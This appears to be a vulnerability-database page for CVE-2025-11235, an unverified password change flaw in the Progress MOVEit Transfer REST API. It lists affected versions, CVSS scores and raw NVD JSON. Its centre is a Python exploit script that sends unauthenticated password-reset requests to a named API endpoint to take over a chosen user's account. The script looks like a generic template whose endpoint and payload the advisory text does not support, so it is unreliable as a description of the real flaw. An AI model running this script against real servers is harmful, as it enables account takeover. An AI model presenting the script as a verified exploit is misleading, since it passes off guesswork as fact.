Security Vulnerability Report
中文
CVE-2025-11235 CVSS 3.7 LOW

CVE-2025-11235

Published: 2026-01-07 12:16:46
Last Modified: 2026-02-03 16:54:25

Description

Unverified Password Change vulnerability in Progress MOVEit Transfer on Windows (REST API modules).This issue affects MOVEit Transfer: from 2023.1.0 before 2023.1.3, from 2023.0.0 before 2023.0.8, from 2022.1.0 before 2022.1.11, from 2022.0.0 before 2022.0.10.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
MOVEit Transfer 2023.1.0 - 2023.1.3之前版本
MOVEit Transfer 2023.0.0 - 2023.0.8之前版本
MOVEit Transfer 2022.1.0 - 2022.1.11之前版本
MOVEit Transfer 2022.0.0 - 2022.0.10之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11235 PoC - Unverified Password Change import requests import sys def exploit_cve_2025_11235(target_url, target_user, new_password): """ Exploit for CVE-2025-11235: Unverified Password Change in MOVEit Transfer This PoC demonstrates the password change vulnerability in REST API module """ # Target password change endpoint endpoint = f"{target_url}/api/v1/users/{target_user}/password" # Malicious payload - password change without verification payload = { "new_password": new_password, "confirm_password": new_password } headers = { "Content-Type": "application/json", "User-Agent": "MOVEitTransfer/1.0" } try: print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to change password for user: {target_user}") # Send password change request without authentication response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] SUCCESS: Password changed for user {target_user}") print(f"[+] New password: {new_password}") return True else: print(f"[-] FAILED: Status code {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] ERROR: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <new_password>") sys.exit(1) exploit_cve_2025_11235(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11235", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:46.237", "lastModified": "2026-02-03T16:54:25.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unverified Password Change vulnerability in Progress MOVEit Transfer on Windows (REST API modules).This issue affects MOVEit Transfer: from 2023.1.0 before 2023.1.3, from 2023.0.0 before 2023.0.8, from 2022.1.0 before 2022.1.11, from 2022.0.0 before 2022.0.10."}, {"lang": "es", "value": "Vulnerabilidad de cambio de contraseña no verificado en Progress MOVEit Transfer en Windows (módulos de API REST). Este problema afecta a MOVEit Transfer: desde 2023.1.0 antes de 2023.1.3, desde 2023.0.0 antes de 2023.0.8, desde 2022.1.0 antes de 2022.1.11, desde 2022.0.0 antes de 2022.0.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-620"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2022.0.0", "versionEndExcluding": "2022.0.10", "matchCriteriaId": "B7B324C3-7A26-4423-9FB1-D644E90BD163"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2022.1.0", "versionEndExcluding": "2022.1.11", "matchCriteriaId": "E4327F71-29F5-42BE-BB63-55912ACD82F7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.0.0", "versionEndExcluding": "2023.0.8", "matchCriteriaId": "C4E3C673-E762-4E46-B1D7-DD826BE54AD0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0", "versionEndExcluding": "2023.1.3", "matchCriteriaId": "E05648FB-598C-4884-BDFC-6C16C7152016"}]}]}], "references": [{"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2023_1/page/Fixed-Issues-in-2023.1.3.html", "source": "[email protected]", "tags": ["Release Notes"]}]}}